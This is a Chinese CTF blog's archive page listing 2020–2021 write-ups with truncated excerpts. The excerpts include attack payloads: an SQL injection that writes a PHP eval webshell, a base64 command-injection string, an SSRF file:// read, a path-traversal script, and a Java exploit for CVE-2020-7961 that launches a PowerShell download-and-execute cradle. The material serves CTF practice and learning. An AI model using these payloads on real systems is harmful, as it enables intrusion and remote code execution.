3kCTF2021

2021-05-21 10:05:00 520
wp - 3kctf

AD 一段时间没打国际赛,最近陆队正在组建一支打国际赛的战队,我也混进去划了一下水,上周末我们也打了第一场国际赛试试水(虽然我在打国赛没怎么看题目),不过初次试水师傅们都很给力,个人认为成绩还算可以(No.9): 可以看到截图中出现的两支国内战队虽然也挺猛的,不过这俩支都是高校队伍,不允许外校加入,因此在这里我也给战队打个广告,路过的师傅可以看看:https://blog.zeddyu.i...

AD 一段时间没打国际赛,最近陆队正在组建一支打国际赛的战队,我也混进去划了一下水,上周末我们也打了第一场国际赛试...

阅读全文>>

“红明谷”杯数据安全大赛技能场景赛

2021-04-03 00:04:00 1181
ctf - wp - 红明谷

签到 略过~ write_shell 代码审计: ```php <?php error_reporting(0); highlight_file(FILE); function check($input){ if(preg_match("/'| ||php|;|~|\^|\+|eval|{|}/i",$input)){ // if(preg_match("/'|...

签到 略过~ write_shell 代码审计: ```php <?php error_reporting(...

阅读全文>>

hws硬件营线上选拔赛

2021-02-06 18:02:00 401
ctf - wp - hws

NodeMce 不清楚是否非预期,一个strings直接能看到flag STM stm32单片机,给了一个bin文件,根据http://www.crystalradio.cn/thread-637028-1-1.html来反编译。 ```c _BYTE sub_8000314() { _BYTE v0; // r4 unsigned __int8 *v1; // r5 int v...

NodeMce 不清楚是否非预期,一个strings直接能看到flag STM stm32单片机,给了一个bin文...

阅读全文>>

纵横杯

2020-12-28 10:12:00 802
ctf - wp - 纵横杯

easyci 注apache配置文件出来得到web路径为:/var/sercet/html/ 写shell,大小写绕过 password=a&username=-1' uNion sElect 1,'<?php eval($_POST[1]);?>' into outfile '/var/sercet/html/9.php'--+ hello_php www.zip源码...

easyci 注apache配置文件出来得到web路径为:/var/sercet/html/ 写shell,大小写...

阅读全文>>

roarctf 2020

2020-12-07 21:12:00 441
ctf - wp - roar

虽然题目质量不错。 //但是被注入恶心到的两天 签到 直接读flag读不到,读源码发现是curl,可以二次编码绕过 Payload: http://47.104.232.98:49725/?url=file:///fla%25%36%37 Hi_433MHz 导入au,短的是0,长的是1: 得到: 011001100 011011000 011000010 011001110 011110...

虽然题目质量不错。 //但是被注入恶心到的两天 签到 直接读flag读不到,读源码发现是curl,可以二次编码绕过...

阅读全文>>

首届“祥云杯”网络安全大赛

2020-11-24 15:11:00 549
ctf - wp - 祥云杯

Command 签到题,过滤了如下: base64+%09绕一下过滤,因为匹配大小写,所以可能会出现这种情况: 稍微加点空格什么的修修改改就行了,payload: ?url=|echo%09"Y2FcdCAvZXRjLy5maW5kZmxhZy8q"|base64%09-d|ba\s\h flaskbot 通过各种让他报错拿到一份大概的源码: 可以看到这里用了render_templ...

Command 签到题,过滤了如下: base64+%09绕一下过滤,因为匹配大小写,所以可能会出现这种情况: ...

阅读全文>>

ciscn 2020 final web

2020-10-10 12:10:00 454
ctf - wp - ciscn

文章首发于:合天 web1 输入1点击输入框后会显示如下参数: ?id=1&limit=1 看下源码能得到这么两句sql语句: <!-- $query = "SELECT * FROM fake_flag WHERE id = $id limit 0,$limit"; //$query = "SELECT flag FROM real_flag WHERE id = $id ...

文章首发于:合天 web1 输入1点击输入框后会显示如下参数: ?id=1&limit=1 看下源码能得到...

阅读全文>>

ciscn2020初赛

2020-08-21 18:08:00 847
ctf - wp - ciscn

easyphp 源码给出: ```php <?php //题目环境:php:7.4.8-apache $pid = pcntl_fork(); if ($pid == -1) { die('could not fork'); }else if ($pid){ $r=pcntl_wait($status); ...

easyphp 源码给出: ```php <?php //题目环境:php:7.4.8-apache...

阅读全文>>

DASCTF 七月

2020-07-26 01:07:00 523
wp - dasctf

好久没发文了,水水 web1 前缀固定,发现../被过滤了,但这道题只是过滤了开头的../,搞不明白这么出题有什么意思。。 ```python import time import requests import base64 file = "hhhm/../../../../../../../../flag" file = base64.b64encode(file.encode()) ...

好久没发文了,水水 web1 前缀固定,发现../被过滤了,但这道题只是过滤了开头的../,搞不明白这么出题有什么...

阅读全文>>

DozerCTF

2020-06-15 14:06:00 966
ctf - wp - DozerCTF

简单的域渗透1 一血,感觉是非预期?前面直接用powercat弹shell,后面怎么都弹不到了? Liferay的cve:CVE-2020-7961 ```java public class Exploit { static { try { String[] cmd = {"cmd.exe", "/c", "powershell IEX (New-Object System.Net.Webc...

简单的域渗透1 一血,感觉是非预期?前面直接用powercat弹shell,后面怎么都弹不到了? Liferay的...

阅读全文>>

GKCTF2020

2020-05-25 22:05:00 649
ctf - wp - GKCTF

题目算是挺适合我的难度,后面还有一个反序列化题看着挺麻烦的就没搞,有空再复现了 CheckIN 直接给了一个eval: ```php <?php highlight_file(FILE); class ClassName { public $code = null; public $decode = null; function __c...

题目算是挺适合我的难度,后面还有一个反序列化题看着挺麻烦的就没搞,有空再复现了 CheckIN 直接给了一个eva...

阅读全文>>

网鼎杯 2020(青龙)

2020-05-12 19:05:00 649
ctf - wp - 网鼎

再次吐槽一个队伍只能开一个容器,大早上起来迟迟不放web题。 AreUSerialz 反序列化利用,给出源码: ```php <?php include("flag.php"); highlight_file(FILE); class FileHandler { protected $op; protected $filename; protected $content; funct...

再次吐槽一个队伍只能开一个容器,大早上起来迟迟不放web题。 AreUSerialz 反序列化利用,给出源码: `...

阅读全文>>

De1CTF 2020

2020-05-06 23:05:00 695
ctf - wp - De1CTF

题都挺难的,学到好多,下次一定(不会 Check In fuzz了一下,php不给过,可以.htaccess,因为php给ban了,后面Gq师傅说跟nuca2019一样直接用斜杆换行可以绕过,那么直接用auto_append_file包含一个文件,文件放base64,用伪协议解base64直接catflag。 AddType application/x-httpd-p\ hp .jpg p\...

题都挺难的,学到好多,下次一定(不会 Check In fuzz了一下,php不给过,可以.htaccess,因为...

阅读全文>>


CopyRight © 2019-2020 HhhM
Power By Django & Bootstrap
已运行
粤ICP备19064649号